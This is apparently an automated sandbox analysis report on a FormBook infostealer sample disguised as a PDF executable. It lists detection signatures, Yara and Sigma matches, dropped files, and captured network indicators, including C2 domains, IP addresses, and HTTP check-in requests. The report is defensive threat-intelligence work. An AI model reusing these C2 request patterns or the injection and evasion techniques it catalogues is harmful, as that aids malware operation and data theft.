download Ips-k9-r-1.1-a-7.0-2-e3.pkg

This report requires a browser window with a width of at least 1024px. Please maximize your browser window, or increase your screen resolution.

Play interactive tour Edit tour

Windows Analysis Report DOC209272621615.PDF.exe

Overview

General Information

Sample Name:	DOC209272621615.PDF.exe
Analysis ID:	532011
MD5:	e5d9db9823fb854169e25fceca42e804
SHA1:	9982908b8dcddd6ef44d80e0f6491ad87b80e53d
SHA256:	dbe703a0b4d7694e0d05d6a1f5f8c8bbae4a8d6b5acba1238da5b2f523fa9565
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Allocates memory in foreign processes

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Contains functionality to inject code into remote processes

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

Creates a thread in another existing process (thread injection)

Contains functionality to inject threads in other processes

Sigma detected: Suspicious Rundll32 Without Any CommandLine Params

Uses an obfuscated file name to hide its real file extension (double extension)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Creates a DirectInput object (often for capturing keystrokes)

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to detect sandboxes (mouse cursor move detection)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

×

Process Tree

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
DOC209272621615.PDF.exe	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x96c92:$i2: sserddAcorPteG 0x96fdc:$i2: sserddAcorPteG 0x96d0a:$i3: AyrarbiLdaoL

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Contacts\zcmnlkkW.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\Contacts\Wkklnmcz.exe	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x96c92:$i2: sserddAcorPteG 0x96fdc:$i2: sserddAcorPteG 0x96d0a:$i3: AyrarbiLdaoL

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 3372

Sigma detected: Suspicious Rundll32 Without Any CommandLine Params

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 3372

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: DOC209272621615.PDF.exe

ReversingLabs: Detection: 33%

Yara detected FormBook

Show sources

Source: Yara match	File source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe

ReversingLabs: Detection: 33%

Antivirus or Machine Learning detection for unpacked file

Show sources

Source: 12.0.mobsync.exe.72480000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.logagent.exe.72480000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.mobsync.exe.72480000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.DOC209272621615.PDF.exe.3590000.2.unpack	Avira: Label: TR/Hijacker.Gen
Source: 12.0.mobsync.exe.72480000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.logagent.exe.72480000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.Wkklnmcz.exe.3450000.2.unpack	Avira: Label: TR/Hijacker.Gen
Source: 10.2.Wkklnmcz.exe.72480000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.0.DOC209272621615.PDF.exe.3590000.3.unpack	Avira: Label: TR/Hijacker.Gen
Source: 12.0.mobsync.exe.72480000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.logagent.exe.72480000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.mobsync.exe.72480000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.Wkklnmcz.exe.72480000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.0.DOC209272621615.PDF.exe.3590000.6.unpack	Avira: Label: TR/Hijacker.Gen
Source: 10.2.Wkklnmcz.exe.3590000.2.unpack	Avira: Label: TR/Hijacker.Gen
Source: 7.2.logagent.exe.72480000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.logagent.exe.72480000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: DOC209272621615.PDF.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49757 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: cryptbase.pdbt source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: WWAHost.pdb source: mobsync.exe, 0000000C.00000002.462120401.0000000005040000.00000040.00020000.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwinmm.pdb source: WerFault.exe, 00000005.00000002.328390174.00000000009E2000.00000004.00000001.sdmp
Source:	Binary string: WWAHost.pdbUGP source: mobsync.exe, 0000000C.00000002.462120401.0000000005040000.00000040.00020000.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: logagent.exe, 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp, logagent.exe, 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.461547697.0000000004CBF000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.460534090.0000000004BA0000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.816777544.0000000004690000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.817065918.00000000047AF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461781268.0000000003BBF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461510475.0000000003AA0000.00000040.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp, logagent.exe, logagent.exe, 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp, logagent.exe, 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.461547697.0000000004CBF000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.460534090.0000000004BA0000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.816777544.0000000004690000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.817065918.00000000047AF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461781268.0000000003BBF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461510475.0000000003AA0000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdb source: logagent.exe, 00000007.00000002.434750014.00000000049A0000.00000040.00020000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: logagent.exe, 00000007.00000002.434750014.00000000049A0000.00000040.00020000.sdmp
Source:	Binary string: winmm.pdb source: WerFault.exe, 00000005.00000003.303898040.0000000004EE0000.00000004.00000001.sdmp
Source:	Binary string: a7~winmm.pdb source: WerFault.exe, 00000005.00000003.304269089.0000000004F64000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303618478.0000000004F5E000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.304006492.0000000004F64000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.304486310.0000000004F64000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: logagent.pdb source: rundll32.exe, 00000012.00000002.811265717.00000000004C4000.00000004.00000020.sdmp, rundll32.exe, 00000012.00000002.817526950.0000000004BC7000.00000004.00020000.sdmp
Source:	Binary string: winmm.pdb( source: WerFault.exe, 00000005.00000003.303898040.0000000004EE0000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: logagent.pdbGCTL source: rundll32.exe, 00000012.00000002.811265717.00000000004C4000.00000004.00000020.sdmp, rundll32.exe, 00000012.00000002.817526950.0000000004BC7000.00000004.00020000.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00405CBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,		6_2_00405CBC
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_00405CBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,		10_2_00405CBC

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49843 -> 156.235.157.134:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49843 -> 156.235.157.134:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49843 -> 156.235.157.134:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.sumikkoremon.com
Source: C:\Windows\explorer.exe	Network Connect: 156.235.157.134 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.sa-pontianak.com
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.neema.xyz
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 165.32.109.217 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.9etmorea.info
Source: C:\Windows\explorer.exe	Domain query: www.jardingenesis.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: www.era636.com
Source: C:\Windows\explorer.exe	Network Connect: 197.248.5.16 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.217 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 86.105.245.69 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ncgf08.xyz
Source: C:\Windows\explorer.exe	Domain query: www.piiqrio.com
Source: C:\Windows\explorer.exe	Domain query: www.hwkm.net
Source: C:\Windows\explorer.exe	Domain query: www.meishangtianhua.com
Source: C:\Windows\explorer.exe	Domain query: www.tourbox.xyz
Source: C:\Windows\explorer.exe	Network Connect: 163.44.239.73 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.67.222.132 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.235.200.145 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.enterprisedaas.computer
Source: C:\Windows\explorer.exe	Domain query: www.localproperty.team
Source: C:\Windows\explorer.exe	Network Connect: 64.69.40.19 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.hbjngs.com
Source: C:\Windows\explorer.exe	Network Connect: 154.81.158.75 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.211 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 68.70.164.19 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.finetipster.com
Source: C:\Windows\explorer.exe	Network Connect: 2.57.90.16 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.cis136-tgarza.com
Source: C:\Windows\explorer.exe	Network Connect: 23.224.31.114 80			Jump to behavior

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe	DNS query: www.ncgf08.xyz
Source: C:\Windows\explorer.exe	DNS query: www.tourbox.xyz
Source: C:\Windows\explorer.exe	DNS query: www.neema.xyz
Source:	DNS query: www.tourbox.xyz

HTTP GET or POST without a user agent

Show sources

Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=kv1trFZowiadIe+O9wf8jU76F0yWsAfdW5MSCImgWwgiD9GBizL2DmUTWvRLYZu8pEo+ HTTP/1.1Host: www.ncgf08.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.sa-pontianak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=gP6rjQtpXSIvmASTmEYziIOwC4Gfkrp9Oew9+ghHkWFgU4GrN+F2/eFp8+5BM1VAZDt9 HTTP/1.1Host: www.hbjngs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=T99sF+FFCMRVIrN5sJoW9bSX1euAJ0OSqUAUXGTCOoP2/2ZrE3P4zH5359id1TPJ7WYx&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.sumikkoremon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv HTTP/1.1Host: www.tourbox.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=5IYdhC0GHghhu3qU8D/jZG+rEeM2mibLCs+oL86uP0UJoc5Rrxh3LqrepKBtkhDSDZoq HTTP/1.1Host: www.jardingenesis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=VkzKqNHEMf7DVNqsETKs6wpXpLehvGO8WXwP2kNWjaoREXW57VMlBwZntpJdd+mq+oTm HTTP/1.1Host: www.enterprisedaas.computerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=3PJirK5cgl2FciVCq4PQLPbrqQd5ReNTXZ5Wt3Cj+i9zWbfEV8YElnpOrs676e/lB9CQ&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.hwkm.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=GCiqwE+AocZAO2KzorVbe+5cAVR/sER9WTQIWH8MGwbYJAiKk6D+HvwNUH0eDnTOzOM/ HTTP/1.1Host: www.piiqrio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=vQJfxOtI611W+RxH9ddEKx+uNoigK/zmKccwwKjwQCCnv7782yRErdaxoTFecp96gNUO HTTP/1.1Host: www.neema.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=bCINk7waO+AAweJQetcshs4EXJImwvjnAC5D+DXKCvfhq7NWzMtc9ZOrSobl6zpZIFRB&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.cis136-tgarza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=lWYs4BNKo2NyazceVzv2HGKqsI/0suNqMdeNhVGKV3g2YeuVsAaP6gNudbn3yhvqV62w HTTP/1.1Host: www.meishangtianhua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=Czkl40VpJiNRQJS5lWJnKFxHKlnZ6CRMuI4G/gd+YABSgkcyWt+GOUfbjiYokSpGPyAa&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.finetipster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&8pqLWR=BzrlN6PpwXh HTTP/1.1Host: www.sa-pontianak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=AMbF+Q/e/AO7yIAHRf5aUfsWvc/33vy+f/8PmVMiF5qZYbHgDNTXzprpLW2ZF4YvRkgO&8pqLWR=BzrlN6PpwXh HTTP/1.1Host: www.localproperty.teamConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv&8pqLWR=BzrlN6PpwXh HTTP/1.1Host: www.tourbox.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Show sources

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Dec 2021 15:24:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://sumikkoremon.com/wp-json/>; rel="https://api.w.org/"content-length: 5784date: Wed, 01 Dec 2021 15:25:06 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 3c 6c 69 6e 6b 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 75 6d 69 6b 6b 6f 72 65 6d 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 61 75 74 6f 70 74 69 6d 69 7a 65 2f 63 73 73 2f 61 75 74 